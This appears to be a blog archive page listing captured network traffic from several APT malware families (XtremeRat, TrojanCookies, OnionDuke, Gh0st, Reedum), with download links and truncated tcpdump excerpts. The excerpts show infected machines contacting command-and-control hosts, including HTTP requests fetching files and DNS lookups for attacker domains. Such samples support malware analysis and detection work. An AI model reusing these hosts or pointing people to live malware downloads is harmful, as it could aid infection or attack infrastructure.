Category Archives: APT Samples

XtremeRat APT Implant Remote Access Trojan Traffic Sample Download PCAP

Download full PCAP traffic sample : xtremerat.pcap 1970-01-01 -4:-59:-3.627690 IP 10.0.2.15.1050 > 189.75.20.224.81: Flags [P.], seq 1:298, ack 1, win 64240, length 297 E..Q.|@….. ….K…..Q…..L,.P…….GET /1234567890.functions HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: pokemom2015.no-ip.org:81 Connection: Keep-Alive Cache-Control:… Read More »

Share Button

APT TrojanCookies Malware Traffic Sample Trojan PCAP Download

Download TrojanCookies APT PCAP Sample : trojancookies.pcap   2013-01-05 22:41:53.771374 IP 172.16.253.130.1092 > 117.55.241.58.80: Flags [P.], seq 1:280, ack 1, win 64240, length 279: HTTP: GET /indexs.zip HTTP/1.1 E..?.a@….R….u7.:.D.P…\..A P…S…GET /indexs.zip HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR… Read More »

Share Button

OnionDuke APT Malware Traffic Sample PCAP Download

  Download OnionDuke APT Malware : onionduke   1970-01-01 -4:-58:-32.468345 IP 10.0.2.15.1025 > 10.0.2.2.53: 56315+ A? rombeast.site50.net. (37) E..A.q….”+ … ……5.-……………rombeast.site50.net….. 1970-01-01 -4:-58:-32.492920 IP 10.0.2.2.53 > 10.0.2.15.1025: 56315 1/2/0 A 31.170.162.243 (103) E…./..@.b+ … ….5…o\…………..rombeast.site50.net…………..X…………..Q….ns2 000webhost.com………Q….ns1.E 1970-01-01 -4:-58:-32.496438 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [S], seq 3752956870, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0.r@…+. ……….P……..p…A……….. 1970-01-01… Read More »

Share Button

Vintage Gh0st APT FTP Malware Traffic Sample Download PCAP

Download the raw PCAP for Gh0st APT here : Gh0st.pcap   2012-08-05 22:50:40.647899 IP 192.168.106.141.1068 > 121.63.150.15.21: Flags [R.], seq 266, ack 1, win 0, length 0 E..(.W@…….j.y?…,…..F.J.8P……. 2012-08-05 22:50:40.648984 IP 192.168.106.141.1032 > 192.168.106.2.53: 10854+ A? netuser.dns1.us. (33) E..=.X…..w..j…j….5.)..*f………..netuser.dns1.us….. 2012-08-05 22:50:40.698458 IP 192.168.106.2.53 > 192.168.106.141.1032: 10854 1/0/0 A 27.22.117.26 (49) E..M……K)..j…j..5…9N.*f………..netuser.dns1.us……………….u. 2012-08-05 22:50:40.698958 IP 192.168.106.141.1069 >… Read More »

Share Button

APT – Advanced Persistent Threat / MALWARE – Reedum – Historical Traffic Sample

1970-01-01 -4:-59:-35.7292 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 1:17, ack 62, win 64179, length 16 E..8.X@….p …m…….X{.a…?P…l…USER user37704   1970-01-01 -4:-59:-35.7292 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 17, win 65535, length 0 E..(….@.`.m… ……….?X{.qP…|… 1970-01-01 -4:-59:-35.7866 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 62:141, ack 17, win 65535, length 79 E..w….@.`rm… ……….?X{.qP…kZ..331 ………………… Read More »

Share Button